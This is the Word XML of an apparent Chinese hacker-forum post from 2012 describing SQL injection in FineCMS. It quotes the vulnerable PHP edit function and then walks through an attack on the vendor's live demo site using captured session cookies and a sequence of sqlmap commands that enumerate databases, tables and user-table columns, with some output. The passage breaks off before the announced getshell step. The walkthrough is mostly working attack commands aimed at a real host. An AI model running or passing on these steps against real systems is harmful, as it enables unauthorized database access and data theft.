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A18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://forum.90sec.org/forumdisplay.php?fid=10&amp;filter=type&amp;typeid=2" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【原创】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA18CF">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FineCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的注入和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA18CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidTr="00AA18CF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:bookmarkEnd w:id="0"/>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>本</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>帖最后</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>由</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>流浪的风</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>于</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> 2012-11-14 09:29 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>编辑</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>Team:</w:t>
            </w:r>
            <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00AA18CF">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>http</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00AA18CF">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>://c0deplay.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF"/>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>还没学</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>PHP</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>，先学牛们挖洞来了，牛们见笑了。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>程序是</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>FineCMS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>，找到了个注入，接着其他的就看不下去了，只想利用上就</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>OK</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>了。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>注入的文件是</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>\controllers\member\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>ContentController.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">public function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>editAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>() {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br/>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>$id</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>= $this-&gt;get('id');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br/>
              <w:t>$data</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>= $this-&gt;content-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>where(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>userid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=' . $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>memberinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>'id'])-&gt;where('id=' . $id)-&gt;select(false);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br/>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>catid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>= $data['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>catid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>'];</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>\\</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>http://c0deplay.com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br/>
              <w:t>if (empty($data))</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>$this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>memberMsg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>('</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>信息不存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>');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br/>
              <w:t>if (empty($</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>catid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>)) $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>memberMsg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>('</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>信息栏目不存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>');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br/>
              <w:t>$model</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>= $this-&gt;cache-&gt;get('model');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br/>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>modelid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>= $this-&gt;cats[$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>catid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>]['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>modelid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>'];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br/>
              <w:t>$fields</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>= $model[$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>modelid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>]['fields']</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>$id</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>，问题出在这儿，就是利用麻烦了点。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:lastRenderedPageBreak/>
              <w:t>这个是出现在文章编辑的模块，所以，得去注册个用户，发表文章，然后再点击编辑，这些大家都知道的，我略过了。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>在编辑文章这儿，抓包，我用的是</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>Live HTTP Replay</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>，如图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18" name="图片 18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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="3343275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="17" name="图片 17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6869" descr="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8CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:tooltip="1.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF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AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (80.9 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:18</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>好了</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>是：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>PHPSESSID=135qdpqp4e9vm3sda0b3446c13; CNZZDATA4264051=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>cnzz_eid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=96253715-1352780242-</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">&amp;ntime=1352780242&amp;cnzz_a=1&amp;retime=1352782758760&amp;sin=none&lt;ime=1352782758760&amp;rtime=0; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms_member_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=aToyNDM7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>好了，接着打开</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>，开始注入</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">./sqlmap.py -u "http://demo.finecms.net/index.php?s=member&amp;c=content&amp;a=edit&amp;id=655" --cookie "PHPSESSID=135qdpqp4e9vm3sda0b3446c13; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">CNZZDATA4264051=cnzz_eid=96253715-1352780242-&amp;ntime=1352780242&amp;cnzz_a=1&amp;retime=1352782758760&amp;sin=none&lt;ime=1352782758760&amp;rtime=0; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms_member_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">=aToyNDM7" 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16" name="图片 16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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="1428750"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="15" name="图片 15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6870" descr="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8CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:tooltip="2.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF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AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (30.53 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:18</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>有注入，是</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> 5.0</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>的，接着</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">./sqlmap.py -u "http://demo.finecms.net/index.php?s=member&amp;c=content&amp;a=edit&amp;id=655" </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">--cookie "PHPSESSID=135qdpqp4e9vm3sda0b3446c13; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">CNZZDATA4264051=cnzz_eid=96253715-1352780242-&amp;ntime=1352780242&amp;cnzz_a=1&amp;retime=1352782758760&amp;sin=none&lt;ime=1352782758760&amp;rtime=0; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms_member_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=aToyNDM7" –</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AA18CF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14" name="图片 14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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5286375" cy="1638300"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="13" name="图片 13" descr="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6871" descr="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63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8CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:tooltip="3.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF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AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (33.74 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:18</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>available databases [2]:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>information_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">./sqlmap.py -u "http://demo.finecms.net/index.php?s=member&amp;c=content&amp;a=edit&amp;id=655" --cookie "PHPSESSID=135qdpqp4e9vm3sda0b3446c13; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">CNZZDATA4264051=cnzz_eid=96253715-1352780242-&amp;ntime=1352780242&amp;cnzz_a=1&amp;retime=1352782758760&amp;sin=none&lt;ime=1352782758760&amp;rtime=0; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms_member_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=aToyNDM7" --tables -D</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>"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rPr>
                <w:vanish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12" name="图片 12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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="4438650"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="11" name="图片 11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6872" descr="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443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8CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:tooltip="4.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF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AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (70.92 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:18</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>找到表名</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>demo_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>，接着</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">./sqlmap.py -u "http://demo.finecms.net/index.php?s=member&amp;c=content&amp;a=edit&amp;id=655" --cookie "PHPSESSID=135qdpqp4e9vm3sda0b3446c13; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">CNZZDATA4264051=cnzz_eid=96253715-1352780242-&amp;ntime=1352780242&amp;cnzz_a=1&amp;retime=1352782758760&amp;sin=none&lt;ime=1352782758760&amp;rtime=0; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms_member_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=aToyNDM7" --columns -T "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>demo_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>" users-D "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>" -v 0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rPr>
                <w:vanish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10" name="图片 10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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3419475" cy="3600450"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="9" name="图片 9" descr="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6873" descr="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8CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
